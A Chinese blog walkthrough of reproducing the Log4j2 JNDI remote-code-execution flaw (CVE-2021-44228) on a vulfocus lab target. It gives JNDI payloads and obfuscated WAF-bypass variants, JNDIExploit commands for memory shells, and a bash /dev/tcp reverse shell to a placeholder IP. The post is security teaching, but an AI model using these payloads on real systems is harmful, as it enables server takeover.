Apache log4j2 远程命令执行漏洞复现

2022-11-02 15:02:52 浏览数 (1)

前言

Apache log4j2 RCE漏洞(CVE-2021-44228)一出,各大行业知名厂商纷纷中招,与之前的fastjson、shiro漏洞相比更为严重,预计在之后的三四年中漏洞会一直存在。此漏洞影响范围特别广泛,漏洞利用门槛低,危害程度非常大,如果被攻击者恶意利用,危害程度不亚于2017年爆发的“永恒之蓝”漏洞。以下图片来源于网络

0x01 漏洞简介

Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。

  • 漏洞编号:CVE-2021-44228
  • 漏洞等级:紧急
  • CVSS评分:10(最高级)
  • 影响版本:Apache log4j2 2.0 - 2.14.1
  • 安全版本:Apache log4j-2.15.0-rc2

更多关于此漏洞的详细分析:Log4j高危漏洞!具体原因解析!全网第一

0x02 影响范围

该漏洞影响范围极广、危害极大,主要由于该组件应用范围十分广泛,所有使用该组件的所有产品都会受到漏洞影响,因此对其下游造成的软件供应链安全隐患巨大。 目前已知的可能受影响的应用及组件包括但不限于如下:

组件名称

版本信息

Apache Struts2

全版本

ElasticSearch

5.x,6.x,7.x,8.0.0beta1,8.0.0alpha1和8.0.0alpha2

Logstash

5.0.0至最新

Apache Flink

1.11.0-rc1 到 1.14.0

Apache Druid

0.7.x以上

Hadoop Hive

2.x和3.x

Apache Log4j SLF4J Binding

‘2.14.1’, ‘2.14.0’, ‘2.13.3’, ‘2.13.2’, ‘2.13.1’, ‘2.13.0’, ‘2.12.1’, ‘2.12.0’, ‘2.11.2’, ‘2.11.1’, ‘2.11.0’, ‘2.10.0’, ‘2.9.1’, ‘2.9.0’, ‘2.8.2’, ‘2.8.1’, ‘2.8’, ‘2.7’, ‘2.6.2’, ‘2.6.1’, ‘2.6’, ‘2.5’, ‘2.4.1’, ‘2.4’, ‘2.3’, ‘2.2’, ‘2.1’, ‘2.0.2’, ‘2.0.1’, ‘2.0’, ‘2.0-rc2’, ‘2.0-rc1’, ‘2.0-beta9’, ‘2.0-beta8’, ‘2.0-beta7’, ‘2.0-beta6’, ‘2.0-beta5’

Spring Boot

‘2.6.1’, ‘2.6.0’, ‘2.5.7’, ‘2.5.6’, ‘2.5.5’, ‘2.5.4’, ‘2.5.3’, ‘2.5.2’, ‘2.5.1’, ‘2.5.0’, ‘2.4.13’, ‘2.4.12’, ‘2.4.11’, ‘2.4.10’, ‘2.4.9’, ‘2.4.8’, ‘2.4.7’, ‘2.4.6’, ‘2.4.5’, ‘2.4.4’, ‘2.4.3’, ‘2.4.2’, ‘2.4.1’, ‘2.4.0’, ‘2.3.12.RELEASE’, ‘2.3.11.RELEASE’, ‘2.3.10.RELEASE’, ‘2.3.9.RELEASE’, ‘2.3.8.RELEASE’, ‘2.3.7.RELEASE’, ‘2.3.6.RELEASE’, ‘2.3.5.RELEASE’, ‘2.3.4.RELEASE’, ‘2.3.3.RELEASE’, ‘2.3.2.RELEASE’, ‘2.3.1.RELEASE’, ‘2.3.0.RELEASE’, ‘2.2.13.RELEASE’, ‘2.2.12.RELEASE’, ‘2.2.11.RELEASE’, ‘2.2.10.RELEASE’, ‘2.2.9.RELEASE’, ‘2.2.8.RELEASE’, ‘2.2.7.RELEASE’, ‘2.2.6.RELEASE’, ‘2.2.5.RELEASE’, ‘2.2.4.RELEASE’, ‘2.2.3.RELEASE’, ‘2.2.2.RELEASE’, ‘2.2.1.RELEASE’, ‘2.2.0.RELEASE’, ‘2.1.18.RELEASE’, ‘2.1.17.RELEASE’, ‘2.1.16.RELEASE’, ‘2.1.15.RELEASE’, ‘2.1.14.RELEASE’, ‘2.1.13.RELEASE’, ‘2.1.12.RELEASE’, ‘2.1.11.RELEASE’, ‘2.1.10.RELEASE’, ‘2.1.9.RELEASE’, ‘2.1.8.RELEASE’, ‘2.1.7.RELEASE’, ‘2.1.6.RELEASE’, ‘2.1.5.RELEASE’, ‘2.1.4.RELEASE’, ‘2.1.3.RELEASE’, ‘2.1.2.RELEASE’, ‘2.1.1.RELEASE’, ‘2.1.0.RELEASE’, ‘2.0.9.RELEASE’, ‘2.0.8.RELEASE’, ‘2.0.7.RELEASE’, ‘2.0.6.RELEASE’, ‘2.0.5.RELEASE’, ‘2.0.4.RELEASE’, ‘2.0.3.RELEASE’, ‘2.0.2.RELEASE’, ‘2.0.1.RELEASE’, ‘2.0.0.RELEASE’, ‘1.5.22.RELEASE’, ‘1.5.21.RELEASE’, ‘1.5.20.RELEASE’, ‘1.5.19.RELEASE’, ‘1.5.18.RELEASE’, ‘1.5.17.RELEASE’, ‘1.5.16.RELEASE’, ‘1.5.15.RELEASE’, ‘1.5.14.RELEASE’, ‘1.5.13.RELEASE’, ‘1.5.12.RELEASE’, ‘1.5.11.RELEASE’, ‘1.5.10.RELEASE’, ‘1.5.9.RELEASE’, ‘1.5.8.RELEASE’, ‘1.5.7.RELEASE’, ‘1.5.6.RELEASE’, ‘1.5.5.RELEASE’, ‘1.5.4.RELEASE’, ‘1.5.3.RELEASE’, ‘1.5.2.RELEASE’, ‘1.5.1.RELEASE’, ‘1.5.0.RELEASE’, ‘1.4.7.RELEASE’, ‘1.4.6.RELEASE’, ‘1.4.5.RELEASE’, ‘1.4.4.RELEASE’, ‘1.4.3.RELEASE’, ‘1.4.2.RELEASE’, ‘1.4.1.RELEASE’, ‘1.4.0.RELEASE’, ‘1.3.8.RELEASE’, ‘1.3.7.RELEASE’, ‘1.3.6.RELEASE’, ‘1.3.5.RELEASE’, ‘1.3.4.RELEASE’, ‘1.3.3.RELEASE’, ‘1.3.2.RELEASE’, ‘1.3.1.RELEASE’, ‘1.3.0.RELEASE’, ‘1.2.8.RELEASE’, ‘1.2.7.RELEASE’, ‘1.2.6.RELEASE’, ‘1.2.5.RELEASE’, ‘1.2.4.RELEASE’, ‘1.2.3.RELEASE’, ‘1.2.2.RELEASE’, ‘1.2.1.RELEASE’, ‘1.2.0.RELEASE’, ‘1.1.12.RELEASE’, ‘1.1.11.RELEASE’, ‘1.1.10.RELEASE’, ‘1.1.9.RELEASE’, ‘1.1.8.RELEASE’, ‘1.1.7.RELEASE’, ‘1.1.6.RELEASE’, ‘1.1.5.RELEASE’, ‘1.1.4.RELEASE’, ‘1.1.3.RELEASE’, ‘1.1.2.RELEASE’, ‘1.1.1.RELEASE’, ‘1.1.0.RELEASE’, ‘1.0.2.RELEASE’, ‘1.0.1.RELEASE’, ‘1.0.0.RELEASE’

Camel :: Core

‘3.13.0’, ‘3.12.0’, ‘3.11.4’, ‘3.11.3’, ‘3.11.2’, ‘3.11.1’, ‘3.11.0’, ‘3.10.0’, ‘3.9.0’, ‘3.8.0’, ‘3.7.6’, ‘3.7.5’, ‘3.7.4’, ‘3.7.3’, ‘3.7.2’, ‘3.7.1’, ‘3.7.0’, ‘3.6.0’, ‘3.5.0’, ‘3.4.6’, ‘3.4.5’, ‘3.4.4’, ‘3.4.3’, ‘3.4.2’, ‘3.4.1’, ‘3.4.0’, ‘3.3.0’, ‘3.2.0’, ‘3.1.0’, ‘3.0.1’, ‘3.0.0’, ‘2.25.4’, ‘2.25.3’, ‘2.25.2’, ‘2.25.1’, ‘2.25.0’, ‘2.24.3’, ‘2.24.2’, ‘2.24.1’, ‘2.24.0’, ‘2.23.4’, ‘2.23.3’, ‘2.23.2’, ‘2.23.1’, ‘2.23.0’, ‘2.22.5’, ‘2.22.4’, ‘2.22.3’, ‘2.22.2’, ‘2.22.1’, ‘2.22.0’, ‘2.21.5’, ‘2.21.4’, ‘2.21.3’, ‘2.21.2’, ‘2.21.1’, ‘2.21.0’, ‘2.20.4’, ‘2.20.3’, ‘2.20.2’, ‘2.20.1’, ‘2.20.0’, ‘2.19.5’, ‘2.19.4’, ‘2.19.3’, ‘2.19.2’, ‘2.19.1’, ‘2.19.0’, ‘2.18.5’, ‘2.18.4’, ‘2.18.3’, ‘2.18.2’, ‘2.18.1’, ‘2.18.0’, ‘2.17.7’, ‘2.17.6’, ‘2.17.5’, ‘2.17.4’, ‘2.17.3’, ‘2.17.2’, ‘2.17.1’, ‘2.17.0’, ‘2.16.5’, ‘2.16.4’, ‘2.16.3’, ‘2.16.2’, ‘2.16.1’, ‘2.16.0’, ‘2.15.6’, ‘2.15.5’, ‘2.15.4’, ‘2.15.3’, ‘2.15.2’, ‘2.15.1’, ‘2.15.0’, ‘2.14.4’, ‘2.14.3’, ‘2.14.2’, ‘2.14.1’, ‘2.14.0’, ‘2.13.4’, ‘2.13.3’, ‘2.13.2’, ‘2.13.1’, ‘2.13.0’, ‘2.12.5’, ‘2.12.4’, ‘2.12.3’, ‘2.12.2’, ‘2.12.1’, ‘2.12.0’, ‘2.11.4’, ‘2.11.3’, ‘2.11.2’, ‘2.11.1’, ‘2.11.0’, ‘2.10.7’, ‘2.10.6’, ‘2.10.5’, ‘2.10.4’, ‘2.10.3’, ‘2.10.2’, ‘2.10.1’, ‘2.10.0’, ‘2.9.8’, ‘2.9.7’, ‘2.9.6’, ‘2.9.5’, ‘2.9.4’, ‘2.9.3’, ‘2.9.2’, ‘2.9.1’, ‘2.9.0’, ‘2.8.6’, ‘2.8.5’, ‘2.8.4’, ‘2.8.3’, ‘2.8.2’, ‘2.8.1’, ‘2.8.0’, ‘2.7.5’, ‘2.7.4’, ‘2.7.3’, ‘2.7.2’, ‘2.7.1’, ‘2.7.0’, ‘2.6.0’, ‘2.5.0’, ‘2.4.0’, ‘2.3.0’, ‘2.2.0’, ‘2.1.0’, ‘2.0.0’, ‘1.6.4’, ‘1.6.3’, ‘1.6.2’, ‘1.6.1’, ‘1.6.0’, ‘1.5.0’, ‘1.4.0’, ‘1.3.0’, ‘1.2.0’, ‘1.1.0’, ‘1.0.0’, ‘3.0.0-M4’, ‘3.0.0-M3’, ‘3.0.0-M2’, ‘3.0.0-M1’, ‘2.0-M3’, ‘2.0-M2’, ‘2.0-M1’, ‘3.0.0-RC3’, ‘3.0.0-RC2’, ‘3.0.0-RC1’, ‘2.9.0-RC1’

JUnit Vintage Engine

‘5.8.2’, ‘5.8.1’, ‘5.8.0’, ‘5.7.2’, ‘5.7.1’, ‘5.7.0’, ‘5.6.3’, ‘5.6.2’, ‘5.6.1’, ‘5.6.0’, ‘5.5.2’, ‘5.5.1’, ‘5.5.0’, ‘5.4.2’, ‘5.4.1’, ‘5.4.0’, ‘5.3.2’, ‘5.3.1’, ‘5.3.0’, ‘5.2.0’, ‘5.1.1’, ‘5.1.0’, ‘4.12.3’, ‘4.12.2’, ‘4.12.1’, ‘4.12.0’, ‘5.8.0-M1’, ‘5.7.0-M1’, ‘5.6.0-M1’, ‘5.5.0-M1’, ‘5.4.0-M1’, ‘5.3.0-M1’, ‘5.2.0-M1’, ‘5.1.0-M2’, ‘5.1.0-M1’, ‘4.12.0-M6’, ‘4.12.0-M5’, ‘4.12.0-M4’, ‘4.12.0-M3’, ‘4.12.0-M2’, ‘4.12.0-M1’, ‘5.8.0-RC1’, ‘5.7.0-RC1’, ‘5.6.0-RC1’, ‘5.5.0-RC2’, ‘5.5.0-RC1’, ‘5.4.0-RC2’, ‘5.4.0-RC1’, ‘5.3.0-RC1’, ‘5.2.0-RC1’, ‘5.1.0-RC1’, ‘4.12.0-RC3’, ‘4.12.0-RC2’, ‘4.12.0-RC1’

JBoss Logging 3

‘3.4.2.Final’, ‘3.4.1.Final’, ‘3.4.0.Final’, ‘3.3.3.Final’, ‘3.3.2.Final’, ‘3.3.1.Final’, ‘3.3.0.Final’, ‘3.2.1.Final’, ‘3.2.0.Final’, ‘3.1.0.CR2’, ‘3.1.0.CR1’, ‘3.0.0.CR1’, ‘3.3.0.Beta1’, ‘3.2.0.Beta1’, ‘3.1.0.Beta3’, ‘3.1.0.Beta2’, ‘3.1.0.Beta1’, ‘3.0.0.Beta5’, ‘3.0.0.Beta4’, ‘3.0.0.Beta3’, ‘3.0.0.Beta2’, ‘3.0.0.Beta1’

HikariCP

‘5.0.0’, ‘4.0.3’, ‘4.0.2’, ‘4.0.1’, ‘4.0.0’, ‘3.4.5’, ‘3.4.4’, ‘3.4.3’, ‘3.4.2’, ‘3.4.1’, ‘3.4.0’, ‘3.3.1’, ‘3.3.0’, ‘3.2.0’, ‘3.1.0’, ‘3.0.0’, ‘2.7.9’, ‘2.7.8’, ‘2.7.7’, ‘2.7.6’, ‘2.7.5’, ‘2.7.4’, ‘2.7.3’, ‘2.7.2’, ‘2.7.1’, ‘2.7.0’, ‘2.6.3’, ‘2.6.2’, ‘2.6.1’, ‘2.6.0’, ‘2.5.1’, ‘2.5.0’, ‘2.4.7’, ‘2.4.6’, ‘2.4.5’, ‘2.4.4’, ‘2.4.3’, ‘2.4.2’, ‘2.4.1’, ‘2.4.0’, ‘2.3.13’, ‘2.3.12’, ‘2.3.11’, ‘2.3.10’, ‘2.3.9’, ‘2.3.8’, ‘2.3.7’, ‘2.3.6’, ‘2.3.5’, ‘2.3.4’, ‘2.3.3’, ‘2.3.2’, ‘2.3.1’, ‘2.3.0’, ‘2.2.5’, ‘2.2.4’, ‘2.2.3’, ‘2.2.2’, ‘2.2.1’, ‘2.2.0’, ‘2.1.0’, ‘2.0.1’, ‘2.0.0’, ‘1.4.0’, ‘1.3.9’, ‘1.3.8’, ‘1.3.7’, ‘1.3.6’, ‘1.3.5’, ‘1.3.4’, ‘1.3.3’, ‘1.3.2’, ‘1.3.1’, ‘1.3.0’, ‘1.2.9’, ‘1.2.8’, ‘1.2.7’, ‘1.2.6’, ‘1.2.5’, ‘1.2.4’, ‘1.2.3’, ‘1.2.2’, ‘1.2.1’, ‘1.1.9’, ‘1.1.8’, ‘1.1.7’, ‘1.1.6’, ‘1.1.5’, ‘1.1.4’, ‘1.1.3’

Logging

‘1.1.0’, ‘1.0.0’, ‘0.6.0’, ‘0.5.0’, ‘0.4.1’, ‘0.4.0’, ‘0.3.1’, ‘0.3.0’, ‘0.2.6’, ‘0.2.4’, ‘0.2.3’, ‘0.2.2’, ‘0.2.0’, ‘0.1.2’, ‘0.1.1’, ‘0.1.0’, ‘0.5.0-alpha.1’, ‘0.5.0-alpha’

Jedis

‘3.7.0’, ‘3.6.3’, ‘3.6.2’, ‘3.6.1’, ‘3.6.0’, ‘3.5.2’, ‘3.5.1’, ‘3.5.0’, ‘3.4.1’, ‘3.4.0’, ‘3.3.0’, ‘3.2.0’, ‘3.1.0’, ‘3.0.1’, ‘3.0.0’, ‘2.10.2’, ‘2.10.1’, ‘2.10.0’, ‘2.9.3’, ‘2.9.2’, ‘2.9.1’, ‘2.9.0’, ‘2.8.2’, ‘2.8.1’, ‘2.8.0’, ‘2.7.3’, ‘2.7.2’, ‘2.7.1’, ‘2.7.0’, ‘2.6.3’, ‘2.6.2’, ‘2.6.1’, ‘2.6.0’, ‘2.5.2’, ‘2.5.1’, ‘2.5.0’, ‘2.4.2’, ‘2.4.1’, ‘2.4.0’, ‘2.3.1’, ‘2.3.0’, ‘2.2.1’, ‘2.2.0’, ‘2.1.0’, ‘2.0.0’, ‘1.5.2’, ‘1.5.1’, ‘1.5.0’, ‘1.4.0’, ‘1.3.1’, ‘1.3.0’, ‘jedis-3.6.2’, ‘3.1.0-m4’, ‘3.1.0-m3’, ‘3.1.0-m2’, ‘3.1.0-m1’, ‘3.0.0-m1’, ‘2.10.0-m1’, ‘3.7.0-RC1’, ‘3.6.0-RC1’, ‘3.1.0-rc2’, ‘3.1.0-rc’, ‘3.0.1-rc1’, ‘3.0.0-rc1’, ‘2.10.0-rc1’, ‘1.5.0-RC2’, ‘1.5.0-RC1’, ‘4.0.0-beta4’, ‘4.0.0-beta3’, ‘4.0.0-beta2’, ‘4.0.0-beta1’

WSO2 Carbon Kernel Core

‘5.2.13’, ‘5.2.8’, ‘5.2.7’, ‘5.2.6’, ‘5.2.5’, ‘5.2.4’, ‘5.2.3’, ‘5.2.2’, ‘5.2.1’, ‘4.6.2’, ‘4.6.1’, ‘4.6.0’, ‘4.5.1’, ‘4.4.37’, ‘4.4.36’, ‘4.4.35’, ‘4.4.34’, ‘4.4.33’, ‘4.4.32’, ‘4.4.31’, ‘4.4.30’, ‘4.4.29’, ‘4.4.28’, ‘4.4.27’, ‘4.4.26’, ‘4.4.25’, ‘4.4.24’, ‘4.4.23’, ‘4.4.22’, ‘4.4.21’, ‘4.4.20’, ‘4.4.19’, ‘4.7.0-m6’, ‘4.7.0-m5’, ‘4.7.0-m4’, ‘4.7.0-m3’, ‘4.7.0-m2’, ‘4.7.0-m1’, ‘4.6.3-m5’, ‘4.6.3-m4’, ‘4.6.3-m3’, ‘4.6.3-m2’, ‘4.6.3-m1’, ‘4.6.2-m9’, ‘4.6.2-m8’, ‘4.6.2-m7’, ‘4.6.2-m6’, ‘4.6.2-m5’, ‘4.6.2-m4’, ‘4.6.2-m3’, ‘4.6.2-m2’, ‘4.6.2-m1’, ‘4.6.1-m8’, ‘4.6.1-m7’, ‘4.6.1-m6’, ‘4.6.1-m5’, ‘4.6.1-m4’, ‘4.6.1-m3’, ‘4.6.1-m2’, ‘4.6.1-m1’, ‘4.6.1-beta2’, ‘4.6.1-beta’, ‘4.6.0-beta2’, ‘4.6.1-alpha3’, ‘4.6.1-alpha2’, ‘4.6.1-alpha’, ‘4.6.0-alpha2’, ‘4.6.0-alpha’

以上应用/组件受影响版本统计数据来自:微步情报局 微步在线研究响应中心

0x03 演示环境

演示靶场采用vulfocus在线平台的log4j2-rce靶场,该靶场漏洞位置存在于/hello路径

vulfocus的log4j2-rce靶场的请求数据包如下:

代码语言:javascript复制
POST /hello HTTP/1.1
Host: vulfocus.fofa.so:30861
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

payload=xxxxxx

漏洞验证过程使用dnslog、burpsuite、JNDIExploit以及拥有公网ip的vps的服务器,建议java依赖环境采用jdk8u191以下版本进行复现。

  • dnslog:http://www.dnslog.cn/
  • JNDIExploit:https://github.com/feihong-cs/JNDIExploit
  • jdk8:https://www.wmzhe.com/soft-70159.html

0x04 漏洞检测

1. dnslog手动验证

首先在dnslog平台生成一个地址,然后利用该地址构造payload让靶机对dnslog平台发起请求:

代码语言:javascript复制
POST /hello HTTP/1.1
Host: vulfocus.fofa.so:30861
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

payload=${jndi:ldap://03ibvw.dnslog.cn}

请求成功后,dnslog平台点击 Refresh Record 后会接收靶机的请求,记录了靶机的请求的ip地址以及响应时间

通过上述步骤验证,在演示靶场环境中可以确定漏洞是真实存在的,但在真实环境中只能说初步判断目标是有大概率存在漏洞的,由于真实环境中的一些复杂因素,即使dnslog请求成功了也不能完全保证目标一定存在rce漏洞。

2. log4j2 burp 被动扫描

log4j2_burp_scan log4j2 是一款被动的 burp rce扫描工具,支持get post cookie 全参数识别,在 ceye.io api速率限制下,最大线程扫描每一个参数,记录过滤已检测地址。

  • 2021-12-11 增加了header头部检测,HSOT,User-agent,referer,Origin,AUTH,Forwarded-For-Ip,Forwarded-For,Forwarded,X-Client-IP,X-Rewrite-URL
  • 下载地址:https://pan.baidu.com/s/1hXCPj9tlZTC3799h9sKQjA 提取码: 7b7v

打开 log4j-1.1.py文件将修改自己ceye账号的API Token和Identifier值,没有账号的话可以去注册一个ceye.io

打开BurpSuite->Extender->Options,加载插件前先配置好Jython和python2的模块文件夹,否则加载插件会不成功

  • Jython 点击下载 提取码: h6br

然后打开BurpSuite->Extender->Extensions,加载log4j2_burp_scan插件即可

浏览器开启BurpSuite代理,再次访问请求漏洞靶场(注意带上测试参数),即可被动扫描出漏洞

3. log4j请求头Fuzz测试

log4j-fuzz-head-poc针对log4j来批量fuzz请求头,有效检测一些头部存在的安全风险,nuclei默认使用interactsh的dnslog

支持以下请求头字段检测:

代码语言:javascript复制
X-Client-IP
X-Remote-IP
X-Remote-Addr
X-Forwarded-For
X-Originating-IP
User-Agent
Referer
CF-Connecting_IP
True-Client-IP
X-Forwarded-For
Originating-IP
X-Real-IP
X-Client-IP
Forwarded
Client-IP
Contact
X-Wap-Profile
X-Api-Version

v2版本添加了绕过rc1的poc 也同时能绕过常见主流waf拦截,还有高版本jdk绕过

代码语言:javascript复制
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

首先需要把nuclei工具下载安装到本地

代码语言:javascript复制
https://github.com/projectdiscovery/nuclei

然后下载log4j-fuzz-head-poc到nuclei的同目录下

代码语言:javascript复制
https://github.com/test502git/log4j-fuzz-head-poc

执行如下命令即可快速针对log4j批量fuzz请求头检测漏洞

代码语言:javascript复制
# 单个检测  速率为30
./nuclei -t log4j-fuzz-head-poc.yaml -u http://www.test.com  -o res.txt  -rl 30
# 批量检测  速率为30
./nuclei -t log4j-fuzz-head-poc.yaml -l urls.txt  -o res.txt   -rl 30

用-p参数指定BurpSuite的代理,可以在BurpSuite中看到请求和响应包的详细信息

代码语言:javascript复制
示例:
./nuclei -t log4j-fuzz-head-poc-v2.yaml -u http://vulfocus.fofa.so:52197/ -o res.txt  -rl 30 -p http://127.0.0.1:8080

参数说明:
-t 要检测的模板种类
-u 测试目标地址
-o 结果保存到文件
-rl 速率
-p 指定代理

也可以直接通过-debug参数,在终端中看到请求和响应包的详细信息

0x05 漏洞复现

1. JNDIExploit

JNDIExploit是一款用于 JNDI注入 利用的工具,大量参考/引用了 Rogue JNDI 项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。

  • 下载地址: https://pan.baidu.com/s/1lmday3MHoPHI5f9rHNjV2Q 提取码: 5686

使用 java -jar JNDIExploit.jar -u 查看支持的 LDAP 格式

代码语言:javascript复制
Supported LADP Queries
* all words are case INSENSITIVE when send to ldap server

[ ] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.
    ldap://127.0.0.1:1389/Basic/Dnslog/[domain]
    ldap://127.0.0.1:1389/Basic/Command/[cmd]
    ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/Basic/TomcatEcho
    ldap://127.0.0.1:1389/Basic/SpringEcho
    ldap://127.0.0.1:1389/Basic/WeblogicEcho
    ldap://127.0.0.1:1389/Basic/TomcatMemshell1
    ldap://127.0.0.1:1389/Basic/TomcatMemshell2  ---need extra header [Shell: true]
    ldap://127.0.0.1:1389/Basic/JettyMemshell
    ldap://127.0.0.1:1389/Basic/WeblogicMemshell1
    ldap://127.0.0.1:1389/Basic/WeblogicMemshell2
    ldap://127.0.0.1:1389/Basic/JBossMemshell
    ldap://127.0.0.1:1389/Basic/WebsphereMemshell
    ldap://127.0.0.1:1389/Basic/SpringMemshell

[ ] Deserialize Queries: ldap://127.0.0.1:1389/Deserialization/[GadgetType]/[PayloadType]/[Params], e.g.
    ldap://127.0.0.1:1389/Deserialization/URLDNS/[domain]
    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK1/Dnslog/[domain]
    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho
    ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho
    ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho
    ldap://127.0.0.1:1389/Deserialization/Jre8u20/TomcatMemshell1
    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2555/WeblogicMemshell1
    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2    ---ALSO support other memshells

[ ] TomcatBypass Queries
    ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]
    ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]
    ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho
    ldap://127.0.0.1:1389/TomcatBypass/SpringEcho
    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1
    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2   ---need extra header [Shell: true]
    ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell

[ ] GroovyBypass Queries
    ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]
    ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]

[ ] WebsphereBypass Queries
    ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell
    ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path]   ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp

目前支持的所有 PayloadType 为

代码语言:javascript复制
Dnslog: 用于产生一个DNS请求,与 DNSLog平台配合使用,对Linux/Windows进行了简单的适配
Command: 用于执行命令,如果命令有特殊字符,支持对命令进行 Base64编码后传输
ReverseShell: 用于 Linux 系统的反弹shell,方便使用
TomcatEcho: 用于在中间件为 Tomcat 时命令执行结果的回显,通过添加自定义header cmd: whoami 的方式传递想要执行的命令
SpringEcho: 用于在框架为 SpringMVC/SpringBoot 时命令执行结果的回显,通过添加自定义header cmd: whoami 的方式传递想要执行的命令
WeblogicEcho: 用于在中间件为 Weblogic 时命令执行结果的回显,通过添加自定义header cmd: whoami 的方式传递想要执行的命令
TomcatMemshell1: 用于植入Tomcat内存shell, 支持Behinder shell 与 Basic cmd shell
TomcatMemshell2: 用于植入Tomcat内存shell, 支持Behinder shell 与 Basic cmd shell, 使用时需要添加额外的HTTP Header Shell: true, 推荐使用此方式
SpringMemshell: 用于植入Spring内存shell, 支持Behinder shell 与 Basic cmd shell
WeblogicMemshell1: 用于植入Weblogic内存shell, 支持Behinder shell 与 Basic cmd shell
WeblogicMemshell2: 用于植入Weblogic内存shell, 支持Behinder shell 与 Basic cmd shell,推荐使用此方式
JettyMemshell: 用于植入Jetty内存shell, 支持Behinder shell 与 Basic cmd shell
JBossMemshell: 用于植入JBoss内存shell, 支持Behinder shell 与 Basic cmd shell
WebsphereMemshell: 用于植入Websphere内存shell, 支持Behinder shell 与 Basic cmd shell

目前支持的所有 GadgetType 为

代码语言:javascript复制
URLDNS
CommonsBeanutils1
CommonsBeanutils2
CommonsCollectionsK1
CommonsCollectionsK2
C3P0
Jdk7u21
Jre8u20
CVE_2020_2551
CVE_2020_2883

WebsphereBypass 中的 3 个动作:

代码语言:javascript复制
list:基于XXE查看目标服务器上的目录或文件内容
upload:基于XXE的jar协议将恶意jar包上传至目标服务器的临时目录
rce:加载已上传至目标服务器临时目录的jar包,从而达到远程代码执行的效果(这一步本地未复现成功,抛java.lang.IllegalStateException: For application client runtime, the client factory execute on a managed server thread is not allowed.异常,有复现成功的小伙伴麻烦指导下)
2. VPS部署ldap服务

将JNDIExploit传到vps服务器上并执行如下命令

代码语言:javascript复制
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i xx.xx.xx.xx  

必选参数:
  * -i, --ip       # vps公网ip
可选参数:
    -l, --ldapPort # 指定Ldap端口 (默认: 1389)
    -p, --httpPort # 指定Http端口 (默认: 8080)
3. 命令执行回显

JNDIExploit支持以下几种回显命令方式:

代码语言:javascript复制
ldap://127.0.0.1:1389/Basic/TomcatEcho
ldap://127.0.0.1:1389/Basic/SpringEcho
ldap://127.0.0.1:1389/Basic/WeblogicEcho

ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho
ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho
ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho

ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho
ldap://127.0.0.1:1389/TomcatBypass/SpringEcho

使用方法就是在用回显的payload时,在请求头中添加cmd字段和要执行的命令即可

获取靶机中的flag

4. 反弹主机shell

首先在vps上开启端口监听

代码语言:javascript复制
nc -lvvp 8888

构造payload,将要执行的命令进行base64编码(注意需要将base64加密后的“ ”号进行url编码 ,burpsuite中需要双重url编码,否则“ ”号会被当成空格解析掉,导致命令执行不成功)

代码语言:javascript复制
原始命令:bash -i >& /dev/tcp/xx.xx.xx.xx/8888 0>&1
Base64编码:YmFzaCAtaSA JiAvZGV2L3RjcC8xNjIuMTQuMTE1LjI0Ni84ODg4IDA JjE=
